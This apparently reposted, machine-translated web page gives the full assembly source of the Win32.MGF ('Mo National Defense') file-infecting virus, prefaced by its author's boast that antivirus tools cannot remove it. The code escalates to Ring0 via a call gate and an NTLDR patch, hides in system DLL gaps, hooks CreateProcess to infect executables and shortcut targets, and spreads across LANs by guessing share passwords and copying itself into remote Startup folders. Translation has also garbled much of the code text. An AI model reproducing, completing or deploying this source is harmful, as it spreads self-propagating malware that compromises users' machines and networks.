"Mo National Defense" virus (Win32.MGF) source program

zhaozj2021-02-12  155

"Mo National Defense" Virus (WIN32.MGF) source procedure

Warning: This program is only for learning research, which is not allowed to change the new variety of viruses, and it is not allowed to add destructive code, and you remember!

Wearing:; 1, worship Chen Yinghao, want to be with CiH a higher than high ;; 2. Communication technology, improve the level of the country (if you read the source program, track a virus, your technology will increase); ; 3, let the world know that China is still there;

Related Art: 1. 1, enter Ring0: Add CallGate directly to GDT directly in Win98; in Win 2000 / XP / 2003; CallGate is written in NTLDR, take effect after restart (original technology, this is also A vulnerability of Windows 2000 / XP / 2003). 2, resident memory: Since all DLL modules are loaded after memory, only 1k space is used in the file head, there is 3K space, so this virus; put its own 3K in the gap of kernel32.dll, there is 2K Placed in user32.dll, but Win98 is relatively special, and 2K is left with VXD; _pageallocate allocates space. The poison resides in the unconventional process and globalallol memory, but inserts into the module's gap, therefore, it is not seen that the virus is not seen, and it is more difficult to infect the file in the memory, so the virus is difficult to kill. it's here! A lot of anti-virus; software either can't find this virus, even if you find it, you can't kill or kill it, you can't clean it, and you will have no strength (original technology). ; 4, LAN propagation: Crack the remote host's shared password with its own password generator, and then copy the virus to the launch folder of the other party. ; 5, email spread: Oh, there is currently no such function!

Hazard estimation:; 1, affect the normal operation of the poisoned person; Operation (find Bill Gats, who told him to give you the MPR unbearable weight?) ;; 3, there is absolutely no damage to the data, covering BIOS, stealing information information and other malicious behavior.

The technology is constantly improving, maybe there is a more powerful virus, huh, huh

.586p.model flat, stdcalloption casemap: None

INCLUDE Windows.Include kernel32.incinclude user32.incinclude advapi32.include mpr.incincludelib kernel32.libincludelib user32.libludelib advapi32.libincludelib mpr.lib

VirusSize = VirusEnd-offset VirusStartVirusSizeP1 = offset _OtherMemPosition-offset VirusStart offset; IBDV VirusSizeP2 = VirusSize-VirusSizeP1 infected PE file memory portion; the second half of this toxic, inactive .codeVirusStart: noppushfdpushad

DB 0E8H, 0, 0, 0; this is a call command, which is equivalent to the Push Eippop EBX; EBX = EBX instructions in memory actual address MOV EDX, EBXMOV EBXSUB EBX, $ - 5; actual address - Design address = address difference = replacement value = EbxSub EDX, 8Call _getmoduleAddress; get the loading address of this process Add Eax, [EBX 3CH] MOV LPOLDPE [EBX], EAXSUB EDX, [EAX 28h] Sub Edx, [EAX 34h] add virusexit [ebx], edx; edx = repositioning value of this process, correct the original program entry

Mov Eax, [ESP 24h] Call_getmoduleaddress; get hkernel32mov hkernel32 [ebx], EAXMOV CALLGATESEL [EBX], 103H

Call_getc3address; find the address of RET (0xc3) in the kernel32.dll module

lea esi, [ebx FunctionNameTab 8]; first obtain LoadLibraryA, GetProcAddress, GetVersion address lea edi, FunctionAddressTab [ebx] mov ecx, 3 @@: lodsdadd eax, ebxpush eaxpush hKernel32 [ebx] call _GetProcAddressstosdloop @b

Call dwgetversion [EBX] SHR EAX, 31MOV DWVERSION [EBX], EAX; Windows version is put in dWVersion variable, 98 = 1, 2000 / xp / 2003 = 0

Call _ISwindows9x; if Win98 is immediately added to GDT to add Callgate

LEA ESI, [EBX FunctionNameTab 4 * 7] MOV ECX, 4 @@: lodsdadd EAX, EBX.IF DWVERSION [EBX] MOV BYTE PTR [EAX-2], 'a'.elsemov Byte PTR [EAX-2] , 'W'..ndifloop @B; process ANSI / UNICODE API function name

Call _ProcessimportTab; import all API functions

Lea Eax, Szuser32 [EBX] Push EaxCall DwloadLibrary [EBX] MOV HUSER32 [EBX], EAX

XOR edx, edxlar edx, callgatesel [ebx] .IF DH! = 0ech; if it is the first infection of 2000 / XP / 2003, write CallGate into NTLDR, infecting the desktop's shortcuts corresponding to the EXE file, waiting to restart the CallGate take effect

Push 4LEA Eax, SZNTLDR [EBX] Push EaxCall_Editfile

Call_Editlnkfile

.ELSE; if it is a 2000 / XP / 2003 in Win98 or memory, enter Ring0DW 9BffHDD Offset CallgateSel-4MOV EAX, Espmov ESP, [ESP 4]; Switch Stack Push Eaxmov Eax, CR0BTR EAX, 16MOV CR0, EAX Remove the Keernel32 module read-only memory page write protection

MOV EAX, LPOLDPE [EBX] MOV EDX, DWOLDENTRY [EBX] MOV [EAX 28H], EDXMOV EDX, DWOLDIMAGE [EBX] MOV [EAX 50H], ​​EDX; Recovery Process Inlet and Image Size, Action Some Programs Self-protection

MOV EDI, HKERNEL32 [EBX] Add Edi, [EDI 3CH] MOV EDI, [EDI 54H] Add Edi, Hkernel32 [EBX] MOV LPMEMPSITION1 [EBX], Edilea ESI, VirusStart [EBX] MOV ECX, 10HREPZ CMPSB; Judgment Whether the virus is already in memory

.IF! ZERO?; NOT IN MEM.IF DWVERSION [EBX]; Not in memory push 0fhpush 0push -1push 0push 0push 0push 1push 1 @@: int 20h; vxd -> _ PageAllocatedd 00010053hadd ESP, 8 * 4le EDI, @ b [ebx ] MOV WORD PTR [EDI], 20CDHMOV DWORD PTR [EDI 2], 00010053H.ELSEMOV EAX, HUSER32 [EBX] Add Eax, [EAX 3CH] MOV EAX, [EAX 54H] Add Eax, HUSER32 [EBX]; 2000 / XP / 2003 --- "EAX = USER32.DLL module voids .Endifmov lpMemPosition2 [EBX], EAX

MOV EDI, LPMEMPSITION1 [EBX] Add Edi, Offset_BeforeApi-Offset VirusStartmov DWORD PTR [EBX SZNewcommand 1], EDI; Construction Jump Transfer to the command of the CreateProcess interception function

Mov ESI, DWCREATEPROCESS [EBX] Push Esilea EDI, SZOLDCOMMAND [EBX] MOV ECX, 6REP MOVSB; saving the top 6 bytes of CREATEPROCESS functions

Lea ESI, SZNewcommand [EBX] Pop Edimov ECX, 6Rep Movsb; Transform the first instruction of the CreateProcess function to jump into the intercept function

Lea ESI, VirusStart [EBX] MOV EDI, LPMEMPSITION1 [EBX] MOV ECX, VirussizeP1Rep Movsb; Front 3K Residence in Kernel32 Module

Mov EDI, Eaxmov ECX, VirussizeP2Rep Movsb; 2K after virus resides in the user32 module or vxd _pageallocate points to the page .enDIF

POP Esplea Eax, @ f [EBX] Push EaxRetf; return @@:

.endif

; Create thread for net taint.if dwVersion [ebx]; create infection LAN threads call _MemToFilelea eax, dwVersion [ebx] push eaxpush 0push 0lea eax, _GoLAN [ebx] push eaxpush 0push 0call dwCreateThread [ebx] .endif

ENTER 32, 0; Judgment Site Conditions Push EspCall Dwgetlocaltime [EBX] MOV AX, [ESP 2] MOV DL, 3DIV DL.IF AH == 0 && Word PTR [ESP 4]> = 5push 0le Eax, SzmessageTit [EBX ] Push Eaxle Eax, SzmeSsageText [EBX] Push Eaxpush 0Call DwMessageBox [EBX] .EndifleavePopadPOPFD

DB 68HVIRUSEXIT: DD OFFSET @f; if the virus returns the original program entry, return the control right to the original program; if the virus runs independently, @@:; Go back to the kernel32.dll module, exit the virus process (advanced skills, do not rely on EXITPROCESS). RET

Hkernel32 DD 0HUSER32 DD 0SZUSER32 DB 'USER32.DLL', 0

DWC3ADDRESS DD 0

DwoldImage DD 3000HDWoldentry DD 1000 HLPoldpe DD 0lpMemPosition1 DD 0lpMemPosition2 DD 0

DWVERSION DD 0CALLGATESEL DD 103H

Intercepting the first half of CreateProcess, mainly determined that the previous 6-byte of the original function is restored to ensure CREATEPROCESS; return to the second half of the intercepting function _beforeforeapi: pushfd; extend the stack space, the second half of the block Address Pushfd; Extended Stack Space, CreateProcess's Parameter Top 4 Byte Used Space Pushfd; Save Site PushadCLD

DB 0e8H, 0, 0, 0; Push Eippop EbxSub EBX, $ - 1; EBX = Relocation Value

MOV EDI, DWCREATEPROCESS [EBX] MOV [ESP 24h], Edilea ESI, SzoldCommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSB; enter Ring0 Restore CreateProcess's first 6 bytes of Lea Eax, @ f [ebx] PUSH EaxRetf @@:

MOV EAX, LPMEMPSITION1 [EBX] add eax, offset _behindapi-offset virusstartXCHG EAX, [ESP 2CH]; call the code of the CREATEPROCESS function to return the address, exchange the address of the intercepting function

Lea ESI, [ESP 2CH] Lea EDI, [ESP 28H] MOV ECX, 11REP MOVSDSTOSD; 10 parameters of the CreateProcess function move 4 bytes, and finally returned the address to the stack

MOV ESI, [ESP 28H 4]; the path to the EXE file. IF! ESIMOV ESI, [ESP 28H 4 4] .endif

ENTER 100H, 0xOR Eax, Eaxmov ECX, 100HLA EDI, [EBP-100H] Rep Stosb

XOR EDX, EDXLEA EDI, [EBP-100H] MOV ECX, 80H @@ :. if dwversion [ebx]

Lodsb.if al == 0stosbmov DL, 2.ELSEIF AL == 22Hinc Edx.elsestosb.Endif

.lse

Lodsw.if AX == 0stoswmov DL, 2.ELSEIF AX == 22 Hinc Edx.elsestosw.endif.Endif

CMP DL, 2LOOPNZ @B

.IF dwversion [EBX] Lea ESI, [EBP-100H 2] .elselea ESI, [EBP-100H 4] .ndifmov ECX, 4 @@ :. if dwversion [EBX] Lodsb.elselodsw.Endifshrd Edx, Eax, 8LOOP @BAND EDX, 0DFDFDFDFH; lowercase switch CMP EDX, 'niw /' jz @ f.if! Dwversion [ebx] && edx == 'ORP /' JMP @ F.Endif

Lea Edx, [EBP-100H]

Push 1Push Edxcall_Editfile; Infecting CreateProcess opened PE file

@@: LeavePopadPOPFDRET; Back to the original CreateProcess continues to execute

_Behindapi:; CREATEPROCESS will be jumped here, here is responsible for restoring its first 6 bytes as jump instructions, jump to the first half of the blocking function PushfdpushadCld

DB 0E8H, 0, 0, 0, 0POP EBXSUB EBX, $ - 1

Mov EDI, DWCREATEPROCESS [EBX] Lea ESI, SZNewcommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSBLEA EAX, @ f [EBX] Push EaxRetf @@:

PopadPopfdret; here really returning to CreateProcess address SzoldCommand DB 6 DUP (0) Sznewcommand DB 68H, 0, 0, 0, 0, 0C3HDB 0

Infecting the subprogram of the PE document; _dwflag ----- bit 0: 0 = NTLDR, 1 = pe; bit 1: 0 = MEM, 1 = file; bit 2: 0 = auto (ANSI / Unicode), 1 = ansi_EditFile proc _lpFileName, _dwFlaglocal @hFilelocal @hFileMaplocal @lpFileMaplocal @dwFileSizelocal @dwFileAttributeslocal @ stFileTime1: FILETIMElocal @ stFileTime2: FILETIMElocal @ stFileTime3: FILETIMEpushad

push _lpFileNamebt _dwFlag, 2.if CARRY call dwGetFileAttributesA [ebx] .elsecall dwGetFileAttributes [ebx] .endif; invoke GetFileAttributes, _lpFileName.if eax = - 1mov @ dwFileAttributes, eax?!

Push 80HPUSH _LPFILENAMEBT _DWFLAG, 2.IF Carry? Call DWsetFileAttributesa [EBX] .lsecall dwsetfileAttributes [EBX] .endif; Invoke setFileAttributes, _lpfilename, 80h

push 0push 80hpush 3push 0push 3push 0c0000000hpush _lpFileNamebt _dwFlag, 2.if CARRY call dwCreateFileA [ebx] .elsecall dwCreateFile [ebx] .endif;? invoke CreateFile, _lpFileName, 0c0000000h, 0,0,3,80h, 0.if eax =! 0FFFFFFFHMOV @ Hfile, Eaxpush EaxCall DwgetFileType [EBX] .IF EAX == file_type_disk

Push 0push @HfileCall DwgetFilesize [EBX]; Invoke getFileSize, @ hfile, 0mov @ dwfilesize, EAX

lea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwGetFileTime [ebx]; invoke GetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2, addr @ stFileTime3

Push 0push 0push 0push 4push 0push @HfileCall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, @ Hfile, 0, 4, 0, Eax, 0.if Eaxmov @ HfileMap, EAX

Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX

Bt _dwflag, 0.if carry? .if Word PTR [EAX] == 'zm'.if DWORD PTR [EAX 20H]! =' fgm'add Eax, [EAX 3CH] .IF DWORD PTR [EAX] = = 'EP'BT DWORD PTR [EAX 16H], 13.IF! Carry?

Push @lpfilemapcall dwunmapviewoffile [ebx]

Push @HfilemapCall DWCloseHandle [EBX]

Mov Eax, @ dwfilesizeadd eax, virussize; if it is a PE file that meets the condition, file size extension Virussize bytes

Push 0push eaxpush 0push 4push 0push @HfileCall dwcreatefilemapping [EBX] MOV @ HFILEMAP, EAX

Push 0push 0push 0push 6push eaxcall dwmapviewoffile [EBX] MOV @ lpfilemap, EAX

Add Eax, [EAX 3CH] MOVZX ECX, Word PTR [EAX 6] DEC ECXXCHG EAX, ECXMOV EDX, 28HMUL EDXCHG EAX, ECXMOVZX EDX, WORD PTR [EAX 14H] Add Edx, 18HADD EDX, EaxAdd Edx, ECX; Positioning in the last section

mov edi, @ lpFileMapadd edi, @ dwFileSizebt _dwFlag, 1.if CARRY? lea esi, VirusStart [ebx] mov ecx, VirusSizepushadrep movsbpopad.elsemov esi, lpMemPosition1 [ebx] mov ecx, VirusSizeP1pushadrep movsb.if dwVersion [ebx] mov esi, lpMemPosition2 [ebx] .elselea eax, szUser32 [ebx] push eaxcall dwLoadLibrary [ebx] mov esi, eaxadd esi, [esi 3ch] mov esi, [esi 54h] add esi, eax.endifmov ecx, VirusSizeP2rep movsbpopad.endif; Write the virus code into file MOV ECX, @ dwfilesizeadd ecx, virussizesub ECX, [EDX 14H] MOV [EDX 8], ECXMOV [EDX 10H], ECXMOV DWORD PTR [EDX 24H], 0E00000E0HMOV ECX, [EAX 50h] mov esi, offset dwOldImage-offset VirusStartmov [edi esi], ecxmov ecx, [eax 28h] mov esi, offset dwOldEntry-offset VirusStartmov [edi esi], ecxadd ecx, [eax 34h] mov esi, offset Virusexit-Offset VirusStartmov [EDI ESI], ECXSUB EDI, @ lpfilemapsub EDI, [EDX 14H] Add EDI, [EDX 12] MOV [EAX 28H], Edimov ECX, [EDX 12] Add ECX, [EDX 8] and cx, 0f000hadd ECX, 1000HMOV [EAX 50H], ​​ECXMOV ECX, @ lpfilemapmov DWORD PTR [ECX 20H], 'FGM'; modify PE file header and write infected sign MGF

.endif; 'DLL'

.endif; 'EP'

.endif ;! 'fgm'

.endif; 'zm'

.else; _dwFlag; if it is NTLDR file, write CALLGATElea esi, szGdtData [ebx] mov edi, @ lpFileMapmov ecx, @ dwFileSize @@: inc edipush esipush edipush ecxmov ecx, 10hrepz cmpsbpop ecxpop edipop esiloopnz @b

. IF ZERO? XOR EAX, Eaxmov ECX, 80H @@: Sub EDI, 8PUSH EDIPUSH ECXMOV ECX, 8REPZ ScaSBPOP ECXPOP EdiloOPnz @B

.IF ZERO? Add Edi, 100HLEA ESI, SZCallgate [EBX] MOV ECX, 10HREP MOVSB

MOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI-16], DXSHR EDX, 16MOV Word PTR [EDI-10], DX.Endif

.endif

.ndif; _dwflag

Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif

push @hFileMapcall dwCloseHandle [ebx]; invoke CloseHandle, @ hFileMap.endiflea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwSetFileTime [ebx]; invoke SetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2 Addr @ stfiletime3.endif

Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif

push @dwFileAttributespush _lpFileNamebt _dwFlag, 2.if CARRY call dwSetFileAttributesA [ebx] .elsecall dwSetFileAttributes [ebx] .endif;? call dwSetFileAttributes [ebx]; invoke SetFileAttributes, _lpFileName, @ dwFileAttributes.endif

POPADRET_EDITFILE ENDP

Szgdtdata DW 0FFFH, 0000, 9A00H, 00cfh, 0FFFH, 0000, 9200H, 00CFHSZCallgate DW 0000, 0108H, 0EC00H, 0000, 0FFFH, 0000, 9A00H, 00cfh

SZNTLDR DB 'C: / NTLDR', 0

The getProcadDress function, usage and kernel32.dll's getProcaddress _GetProcaddress proc buy ES ESI EDI, _HModule, _lpszprocnamelocal @dwsize

Mov Edx, _HModuleAdd Edx, [EDX 3CH] MOV EDX, [EDX 78H] Add Edx, _HModuleMov ECX, [EDX 18H] MOV ESI, [EDX 20H] MOV EDI, _LPSZPROCNAME

Push EDIPUSH ECXXOR EAX, EAXMOV ECX, 0FFFFFFFHREPNZ ScaSBNOT ECXDEC ECXMOV @ dwsize, ECX; Calculation Function Name Length POP ECXPOP EDI

Add ESI, _HModule @@: Push Edipush ECXMOV ECX, @ DWSELODSDADD EAX, _HModulexchg Eax, ESIREPZ CMPSBXCHG EAX, ESI Pop EcxPop EdiloPnz @B

.IF! ZERO? xor Eax, EaxRet.endif

Sub ESI, _HModulesub ESI, 4SUB ESI, [EDX 20H] SHR ESI, 1Add ESI, [EDX 24h] Add ESI, _HModuleLodsdmovzx ESI, AXSHL Eax, 2AX, [EDX 1CH] Add Eax, _HModuleMov Edx, [EAX ] add edx, _hmodulexchg Edx, EAX

RET_GETPROCADDRESS ENDP

Words of the LAN _Golan Proc Lparamlocal @Henumlocal @dwcountlocal @szResourceName [32]: Bytelocal @szbuffer [0C00H]: Bytepushad

DB 0E8H, 0, 0, 0POP EBXSUB EBX, $ - 1LEA EAX, @ Henumbush Eaxpush 0push 13hpush 0push 5call dwwnetopENENUM [EBX]

.if! eax.repeatmov @ dwcCount, -1lea eax, dwBufferSize [ebx] push eaxlea eax, @ szBufferpush eaxlea eax, @ dwcCountpush eaxpush @hEnumcall dwWNetEnumResource [ebx] cmp dword ptr [@ szBuffer 14h], 0jnz @ f.until Eaxpush @henumcall dwwnetcloseenum [ebx] .endifjmp _golaanexit

@@: push @henumcall dwwnetcloseenum [EBX] Lea EDI, @ szbuffer

_Nextpc: Push Edimov ESI, [EDI 14H] Lea EDI, @ SzResourceName @@: lodsbstosbor al, aljnz @BMOV DWORD PTR [EDI-1], 'C /' Pop Edi

XOR Eax, Eaxmov DWPassword [EBX], EAX

@@: lea edx, szlocaldrive [ebx] Push Edxpush EaxLea EDX, @ SzResourceNamepush EDXCALL DWNETADCONNECTION [EBX] .IF EAX == 56HCALL _GENPASSWORDCMP DWPASSWORD [EBX], 0JNZ @ B.ELSEIF! EAX

Push 0le Eax, Szdfile [EBX] Push Eaxlea Eax, Szsfile [EBX] Push EaxCall DwcopyFile [EBX]; If you find writable sharing, infecting MOV ESI, EAX

Push 1LEA Eax, Szlocaldrive [EBX] Push EaxCall Dwwnetcancelconnection [EBX] Call _genpasswordor ESI, ESIJZ @B

.endif

Add Edi, 20HDEC @dwccountjnz _nextpc

_Golanexit: popad_golan endp

SzmemTofilename DB 'UNBLASTER.EXE', 0SZSFILE DB 'C: /WINDOWS/SYSTEM/UNBLASTER.EXE', 0SZDFILE DB 'X: / Windows / All Users / Start Menu / Programs / Start /unblaster.exe' ,0

DWPassword DD 0DD 0, 0Szpassword DB 0SzlocalDrive DB 'x:', 0DWBuffersize DD 0C00H

_Genpassword:; generated subroutine, password includes 1234567890! @ # $% ^ Character STD

Pushadlea EDI, [EBX SZPassword-1] xor Edx, Edxmov Eax, Dwpassword [EBX] MOV ECX, 16

@@: div ECXXCHG EAX, EDX.IF AL <= 5ADD Al, 21h.ELSE; if Al> = 6 && Al <= 15ADD Al, 2AH.Endifstosbxor Eax, Eaxxchg Eax, Edxor Eax, Eaxjnz @B

Inc Ediinc DWPassword [EBX] MOV [ESP 20H-4], EDIPOPADCLDRET

_MEMTOFILE PROC; restore virus itself subroutine local @hfilelocal @Hfilemaplocal @lpfilemaplocal @lpsystemdir [40h]: Byte

push 40hlea edi, @ lpSystemDirpush edicall dwGetSystemDirectory [ebx]; invoke GetSystemDirectory, addr @ lpSystemDir, 100hadd edi, eaxmov al, '/' stosblea esi, szMemToFileName [ebx] mov ecx, 16rep movsb

push 0push 80hpush 2push 0push 0push 0c0000000hlea eax, @ lpSystemDirpush eaxcall dwCreateFileA [ebx];! invoke CreateFile, addr @ lpSystemDir, 0c0000000h, 0,0,2,80h, 0.if eax = 0ffffffffhmov @ hFile, eax

Mov Edx, VirussizeAdd Edx, 200h

Push 0PUSH EDXPUSH 0PUSH 4PUSH 0PUSH EaxCall dwcreatefilemapping [EBX]; Invoke CreateFileMapping, Eax, 0, 4, 0, EDX, 0.IF Eaxmov @ HfileMap, EAX

Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX

Mov EDI, ESMOV ESI, Hkernel32 [EBX] MOV ECX, 0A8HREP MOVSB; with Kernel32 DOS head MOV DWORD PTR [EAX 3CH], 0A8HMOV DWORD PTR [EAX 20H], 'Fgm'lea ESI, FileHead [EBX] MOV ecx, 120hrep movsb; original PE header xor eax, eaxmov ecx, 38hrep stosblea esi, VirusStart [ebx] mov ecx, VirusSizepush edirep movsb; virus code pop edimov esi, offset VirusExit-offset VirusStartmov dword ptr [edi esi], offset VirusExit 4

Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif

Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif

Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif

RET_MEMTOFILE ENDP

_ProcessimportTab:; Handmade Import Functions Lea ESI, FunctionNameTab [EBX] Lea Edi, FunctionAddresStab [EBX] @@: Lodsd

.IF EAX == 0ffffffffhlodsdadd Eax, EBXPUSH EAXCALL DWLOADLIBRARY [EBX] MOV ECX, EAX

.ELSEIF EAXADD EAX, EBXPUSH ECXPUSH EAXPUSH ECXCALL DWGETPROCADDRESS [EBX] Stosdpop Ecx.Endifor Eax, Eaxjnz @B

RET

_ISWINDOWS9X:; Add Callgate subroutine to Win98. IF! ZERO?; WIN9XXOR ECX, ECXPUSH ECXPUSH CXSGDT FWORD PTR [ESP] POP ​​CXPOP EDISUB ECX, 8and CL, 0F8hor Cl, 3MOV Callgatesel [EBX], ECX

XOR EDX, EDXLAR EDX, ECX

.IF DH! = 0echand CL, 0F8HMOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI ECX], DXSHR EDX, 16MOV Word PTR [EDI ECX 6], DXMOV DWORD PTR [EDI ECX 2], 0ec000028h .endif

.endifret

_Getmoduleaddress: @@: and ax, 0f000HSUB EAX, 1000HCMP WORD PTR [EAX], 'zm'jnz @BMOV ECX, EaxAdd ECX, [ECX 3CH] CMP DWORD PTR [ECX],' ep'jnz @bret

_Getc3address: Mov Edi, Hkernel32 [EBX] Add Edi, 1000HMOV ECX, 20000HMOV AL, 0C3HCLDREPNZ ScaSBDEC Edimov DWC3ADDRESS [EBX], EDIRET

FunctionAddressTab: dwLoadLibrary dd 0dwGetProcAddress dd 0dwGetVersion dd 0dwCloseHandle dd 0dwCreateProcess dd 0dwCreateFile dd 0dwGetFileAttributes dd 0dwSetFileAttributes dd 0dwCreateFileA dd 0dwGetFileAttributesA dd 0dwSetFileAttributesA dd 0dwGetSystemDirectory dd 0dwCreateFileMapping dd 0dwCreateThread dd 0dwGetFileSize dd 0dwGetFileTime dd 0dwSetFileTime dd 0dwGetFileType dd 0dwGetLocalTime dd 0dwCopyFile dd 0dwMapViewOfFile dd 0dwUnmapViewOfFile dd 0dwFindFirstFile dd 0dwFindNextFile dd 0dwFindClose dd 0dwMessageBox dd 0dwRegCloseKey dd 0dwRegCreateKeyEx dd 0dwRegOpenKeyEx dd 0dwRegQueryValueEx dd 0dwRegSetValueEx dd 0dwWNetAddConnection dd 0dwWNetCancelConnection dd 0dwWNetCloseEnum dd 0dwWNetEnumResource dd 0dwWNetOpenEnum dd 0

_Thermemposition:; 2K in the second half of elsewhere

FunctionNameTab: dd 0ffffffffhdd offset szKernel32dd offset szLoadLibraryAdd offset szGetProcAddressdd offset szGetVersiondd offset szCloseHandledd offset szCreateProcessdd offset szCreateFiledd offset szGetFileAttributesdd offset szSetFileAttributesdd offset szCreateFileAdd offset szGetFileAttributesAdd offset szSetFileAttributesAdd offset szGetSystemDirectoryAdd offset szCreateFileMappingAdd offset szCreateThreaddd offset szGetFileSizedd offset szGetFileTimedd offset szSetFileTimedd offset szGetFileTypedd offset szGetLocalTimedd offset szCopyFileAdd offset szMapViewOfFiledd offset szUnmapViewOfFiledd offset szFindFirstFileAdd offset szFindNextFileAdd offset szFindClosedd 0ffffffffhdd offset szUser32dd offset szMessageBoxAdd 0ffffffffhdd offset szADVAPI32dd offset szRegCloseKeydd offset szRegCreateKeyExAdd offset szRegOpenKeyExAdd offset szRegQueryValueExAdd offset szRegSetValueExAdd 0ffffffffhdd offset szMPRdd offset szWNetAddConnectionAdd offset szWNetCancelConnectionAdd offset szWNe TcloseEnumdd Offset SzwneetenumResourceAdd Offset SzwNetopeNenumAdd 0

szKernel32 db 'kernel32.dll', 0szLoadLibraryA db 'LoadLibraryA', 0szGetProcAddress db 'GetProcAddress', 0szGetVersion db 'GetVersion', 0szCloseHandle db 'CloseHandle', 0szCreateProcess db 'CreateProcessW', 0szCreateFile db 'CreateFileW', 0szGetFileAttributes db 'GetFileAttributesW', 0szSetFileAttributes db 'SetFileAttributesW', 0szCreateFileA db 'CreateFileA', 0szGetFileAttributesA db 'GetFileAttributesA', 0szSetFileAttributesA db 'SetFileAttributesA', 0szGetSystemDirectoryA db 'GetSystemDirectoryA', 0szCreateFileMappingA db 'CreateFileMappingA', 0szCreateThread db 'CreateThread', 0szGetFileSize db 'GetFileSize', 0szGetFileTime db 'GetFileTime', 0szSetFileTime db 'SetFileTime', 0szGetFileType db 'GetFileType', 0szGetLocalTime db 'GetLocalTime', 0szCopyFileA db 'CopyFileA', 0szMapViewOfFile db 'MapViewOfFile', 0szUnmapViewOfFile db 'UnmapViewOfFile', 0szFindFirstFileA db 'FindFirstFileA', 0szFindNextFileA db 'FindNextFileA ', 0SzFindClose DB' FindClose ', 0; Szuser32 DB' User32.dll ', 0SzMessageBoxa DB' MessageBoxa ', 0szADVAPI32 db 'ADVAPI32.dll', 0szRegCloseKey db 'RegCloseKey', 0szRegCreateKeyExA db 'RegCreateKeyExA', 0szRegOpenKeyExA db 'RegOpenKeyExA', 0szRegQueryValueExA db 'RegQueryValueExA', 0szRegSetValueExA db 'RegSetValueExA', 0szMPR db 'MPR.dll', 0szWNetAddConnectionA db 'WNetAddConnectionA ', 0SzwnetCancelConnectiona DB' WnetcancelConnectiona ', 0SzwnetCloseenum DB' WnetCloseenum ', 0SzwnetenumResourceA DB' WneetenumResourceA '

, 0szWNetOpenEnumA db 'WNetOpenEnumA', 0_EditLnkFile proc; infection desktop shortcut subroutine local @hFilelocal @hFileMaplocal @lpFileMaplocal @hFindFilelocal @dwFileSizelocal @dwBufferSizelocal @lpBuffer [80h]: bytelocal @ stWin32FindData: WIN32_FIND_DATApushad

Lea Eax, @ hfilepush eaxpush 1push 0le eax, szregkeydesktop [ebx] push eaxpush 80000001hcall dwregopenkeyex [ebx] .IF! EAX

Mov @ dwbuffersize, 80hle Eax, @ dwbuffersizepush eaxlea eax, @ lpbufferpush eaxpush 0 push 0le eax, szdesktopvalue [EBX] Push Eaxpush @HfileCall DwregQueryValueex [EBX]

Push @HfileCall dwregClosekey [EBX]

Dec @dwbuffersizelea edi, @ lpbufferadd edi, @ dwbuffersize.if byte PTR [EDI-1]! = '/' MOV Al, '/' Stosbinc @ dwbuffersize.endifmov Eax, 'NL. *' Stosdmov Eax, 'K'StosD

lea eax, @ stWin32FindDatapush eaxlea eax, @ lpBufferpush eaxcall dwFindFirstFile [ebx]; to find the first lnk file; invoke FindFirstFile, addr @ lpBuffer, addr @ stWin32FindData.if eax = INVALID_HANDLE_VALUEmov @ hFindFile, eax.repeat!

MOV EAX, DWORD PTR [@ stwin32finddata 20h] MOV @ dwfilesize, EAX

Mov ECX, @ dwbuffersizelea EDI, @ stwin32finddata 2chsub Edi, Ecxlea ESI, @ lpbufferpush EdiRep MovsBPOP EDI

Push 0push 80hpush 3push 0push 1push 80000000hpush edicall dwcreatefilea [EBX]; Invoke Createfile, EDI, 80000000H, 1, 0, 3, 80H, 0.IF EAX! = 0Ffffffffhmov @ Hfile, EAX

Push 0push 0push 0push 2push 0push Eaxcall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, Eax, 0, 2, 0, 0.if Eaxmov @ HfileMap, EAX

Push 0push 0push 0push 4push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 4,0,0,0.if Eaxmov @ lpfilemap, EAX

Lea ESI, [EAX 65H] MOV EDI, ESIV ECX, @ dwfilesizesub ECX, 66H @@: incovush ESIPUSH EDIPUSH ECXMOV ECX, 3REPZ CMPSB; Copy * Path in the exe file in the * .lnk file pop ECXPOP EDIPOP EsiloPnz @B. ? if ZERO && byte ptr [edi 3] mov esi, edisub edi, @ lpFileMapmov ecx, @ dwFileSizesub ecx, edilea edi, @ stWin32FindDatapush edi @@: lodsbstosbor al, alloopnz @bpop edimov eax, [edi 2] and eax 0DFDFDFDFH.IF EAX == 'niw /' xor edi, edi.else.if! Dwversion [ebx] && eax == 'ORP /' XOR EDI, EDI.Endif.Endif

.ELSEXOR EDI, EDI.ENDIF

Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif

Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif

Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif

. IF Edipush 7Push Edicall_Editfile; eligible, infected. Nendif

lea eax, @ stWin32FindDatapush eaxpush @hFindFilecall dwFindNextFile [ebx]; to continue the search lnk files; invoke FindNextFile, @ hFindFile, addr @ stWin32FindData.until eax == 0push @hFindFilecall dwFindClose [ebx]; invoke FindClose, @ hFindFile.endif

.endif

